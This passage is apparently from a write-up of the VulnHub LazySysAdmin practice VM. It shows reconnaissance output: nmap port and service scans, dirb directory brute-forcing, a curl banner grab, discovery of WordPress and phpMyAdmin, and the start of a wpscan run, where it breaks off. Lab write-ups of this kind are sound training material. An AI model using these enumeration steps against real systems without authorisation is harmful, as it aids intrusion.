-T4 -A -v 192.168.0.100 -p 0-10000</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 nmap <span class="cm-attribute">-T4</span> <span class="cm-attribute">-A</span> <span class="cm-attribute">-v</span> <span class="cm-number">192</span>.168.0.31 <span class="cm-attribute">-p0-10000</span>        </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting Nmap <span class="cm-number">7</span>.50 ( https://nmap.org ) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span 
class="cm-number">20</span>:55 CST</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;">PORT     STATE SERVICE     VERSION</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">22</span>/tcp   open  <span class="cm-builtin">ssh</span>         OpenSSH <span class="cm-number">6</span>.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol <span class="cm-number">2</span>.0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| ssh-hostkey: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">1024</span> b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">2048</span> <span class="cm-number">58</span>:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">256</span> <span class="cm-number">61</span>:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  <span class="cm-number">256</span> 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">80</span>/tcp   open  http        Apache httpd <span class="cm-number">2</span>.4.7 ((Ubuntu))</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-generator: Silex v2.2.7</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-methods: </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  Supported Methods: GET HEAD POST OPTIONS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-robots.txt: <span class="cm-number">4</span> disallowed entries </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_/old/ /test/ /TR2/ /Backnode_files/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-server-header: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-title: Backnode</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">139</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">3</span>.X <span class="cm-attribute">-</span> <span class="cm-number">4</span>.X (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">445</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">4</span>.3.11-Ubuntu (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">3306</span>/tcp open  mysql       MySQL (unauthorized)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">6667</span>/tcp open  irc         InspIRCd</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| irc-info: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   server: 
Admin.local</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   users: <span class="cm-number">1</span>.0</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   servers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   chans: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lusers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lservers: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> ident: nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> host: <span class="cm-number">192</span>.168.2.107</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  error: Closing link: (nmap@192.168.2.107) [Client exited]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">MAC Address: <span class="cm-number">08</span>:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Device type: general purpose</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Running: Linux <span class="cm-number">3</span>.X|4.X</span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS details: Linux <span class="cm-number">3</span>.2 <span class="cm-attribute">-</span> <span class="cm-number">4</span>.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Uptime guess: <span class="cm-number">0</span>.008 days (since Wed Jan <span class="cm-number">31</span> <span class="cm-number">20</span>:44:16 <span class="cm-number">2018</span>)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Network Distance: <span class="cm-number">1</span> hop</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TCP Sequence Prediction: <span class="cm-def">Difficulty</span><span class="cm-operator">=</span><span class="cm-number">261</span> (Good luck!)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">IP ID Sequence Generation: All zeros</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Host script results:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> 
(unknown)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Names:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<00>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<03>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<20>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   WORKGROUP<00>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  WORKGROUP<1e>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-os-discovery: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   OS: Windows <span class="cm-number">6</span>.1 (Samba <span class="cm-number">4</span>.3.11-Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Computer name: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   NetBIOS computer name: LAZYSYSADMIN\x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Domain name: \x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   FQDN: 
lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  System time: <span class="cm-number">2018</span><span class="cm-attribute">-01-31T22</span>:55:23<span class="cm-operator">+</span><span class="cm-number">10</span>:00</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-security-mode: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   account_used: guest</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   authentication_level: user</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   challenge_response: supported</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  message_signing: disabled (dangerous, but default)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_smbv2-enabled: Server supports SMBv2 protocol</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TRACEROUTE</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HOP RTT     ADDRESS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">1</span>   <span class="cm-number">0</span>.50 ms LazySysAdmin.lan (192.168.0.100)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span 
cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NSE: Script Post-scanning.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Read data files from: /usr/bin/../share/nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS and Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ .</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Nmap <span class="cm-keyword">done</span>: <span class="cm-number">1</span> IP address (1 host up) scanned <span class="cm-keyword">in</span> <span class="cm-number">31</span>.19 seconds</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           Raw packets sent: <span class="cm-number">11045</span> (487.680KB) | Rcvd: <span class="cm-number">11034</span> (442.816KB)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 2032px;"></div><div class="CodeMirror-gutters" style="display: none; height: 2062px;"></div></div></div></pre><p>Comparing the two, masscan scans ports much faster than nmap, but to learn what services are actually running on those ports you still need nmap. From the scan results the target has ports 22, 80, 139, 445, 3306 and 6667 open.</p><p>Start with the web service and use dirb to brute-force the directories that exist on the target (instructions for installing dirb are appended at the end of the article).</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div 
class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt <span class="cm-attribute">-o</span> /home/evilk0/Desktop/result.txt</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Usage: ./dirb TARGET_URL WORDLIST  <span class="cm-attribute">-o</span> OUTPUT_FILE</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>While the scanner runs, probe for exploitable points by hand. Visiting the target's web service turns up nothing of note. Checking for robots.txt reveals four directories, and directory listing is enabled on them, but they contain no information that can be put to use.</p><p><a href='http://192.168.0.100/robots.txt' target='_blank' class='url'>http://192.168.0.100/robots.txt</a></p><pre class="md-fences md-end-block" lang="http"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div 
class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-error">User-agent: *</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /old/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /test/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /TR2/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /Backnode_files/</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 123px;"></div><div class="CodeMirror-gutters" style="display: none; height: 153px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/1.png' alt='1' referrerPolicy='no-referrer' /></p><p>Use curl to grab the web server's banner: the middleware is Apache 2.4.7 and the target OS is Ubuntu.</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" 
tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 <span class="cm-builtin">curl</span> <span class="cm-attribute">-I</span> <span class="cm-number">192</span>.168.0.100</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HTTP/1.1 <span class="cm-number">200</span> OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Date: Wed, <span class="cm-number">31</span> Jan <span class="cm-number">2018</span> <span class="cm-number">13</span>:01:20 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Server: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Last-Modified: Sun, <span class="cm-number">06</span> Aug <span class="cm-number">2017</span> <span class="cm-number">05</span>:02:15 
GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">ETag: <span class="cm-string">"8ce8-5560ea23d23c0"</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Accept-Ranges: bytes</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Length: <span class="cm-number">36072</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Vary: Accept-Encoding</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Type: text/html</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>Now look at the dirb scan results: the target site runs WordPress, and phpMyAdmin is present as well.</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" 
role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  dirb222 <span class="cm-builtin">cat</span> /home/evilk0/Desktop/result.txt | <span class="cm-builtin">grep</span> <span class="cm-string">"^+"</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/index.html (CODE:200|SIZE:36072)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/info.php (CODE:200|SIZE:77257)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/robots.txt (CODE:200|SIZE:92)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/server-status (CODE:403|SIZE:293)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)</span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 560px;"></div><div class="CodeMirror-gutters" style="display: none; height: 590px;"></div></div></div></pre><p>wpscan scan results</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; 
top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# wpscan http://192.168.0.100/wordpress</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        __          _______   _____                  </span></pre><pre class=" CodeMirror-line " 